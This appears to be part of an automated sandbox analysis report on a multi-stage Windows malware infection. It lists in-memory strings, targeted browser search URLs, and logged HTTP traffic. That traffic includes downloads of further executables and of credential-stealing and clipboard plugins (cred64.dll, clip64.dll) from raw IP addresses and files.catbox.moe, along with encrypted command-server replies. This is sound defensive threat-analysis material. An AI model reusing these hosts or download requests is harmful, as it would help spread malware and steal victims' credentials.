Source: ohcompetitive.exe, 0000000D.00000003.489340121.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comic
Source: ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comn
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ohcompetitive.exe, 0000000D.00000003.510678651.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.510766818.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.de
Source: ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.de%
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ohcompetitive.exe, 0000000D.00000003.510678651.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deFd:
Source: ohcompetitive.exe, 0000000D.00000003.488625546.00000000059EF000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ohcompetitive.exe, 0000000D.00000002.726837895.0000000003152000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.0000000003135000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: 3448.exe, 0000000A.00000003.471606570.000002802F830000.00000004.00000020.00020000.00000000.sdmp, 3448.exe, 0000000A.00000003.471551216.0000028031555000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000000.471803648.0000000000DB2000.00000002.00000001.01000000.00000011.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/67ou2d.mp4
Source: 3448.exe, 0000000A.00000003.471606570.000002802F830000.00000004.00000020.00020000.00000000.sdmp, 3448.exe, 0000000A.00000003.471551216.0000028031555000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/pvcvd6.wav
Source: ohcompetitive.exe, 0000000D.00000002.726837895.0000000003152000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.0000000003135000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe;
Source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003DA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004111000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: files.catbox.moe

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: 7_2_011A79AF InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,SHFileOperationA,

7_2_011A79AF

Source: global traffic	HTTP traffic detected: GET /67ou2d.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pvcvd6.wav HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /new/foto5566.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.124.47
Source: global traffic	HTTP traffic detected: GET /new/fotod250.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.124.47
Source: global traffic	HTTP traffic detected: GET /anon/an.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.124.47
Source: global traffic	HTTP traffic detected: GET /fuzz/raman.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.68.248
Source: global traffic	HTTP traffic detected: GET /rock/Plugins/cred64.dll HTTP/1.1Host: 77.91.68.61
Source: global traffic	HTTP traffic detected: GET /rock/Plugins/clip64.dll HTTP/1.1Host: 77.91.68.61

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50304 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:32:59 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 7Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 03 00 00 00 2d 20 59 Data Ascii: - Y
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:32:59 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 48Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 74 61 82 c9 45 a6 8d 33 9d a0 71 5e f0 0f ac 53 7d 9b 0f cc e8 60 b1 Data Ascii: H>99$JYWtaE3q^S}`
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:00 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 403Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:00 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 48Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 74 61 82 c9 45 a6 8d 33 9d a0 71 5e f0 0f ac 02 7a 98 09 cc e8 60 b1 Data Ascii: H>99$JYWtaE3q^z`
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 403Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>
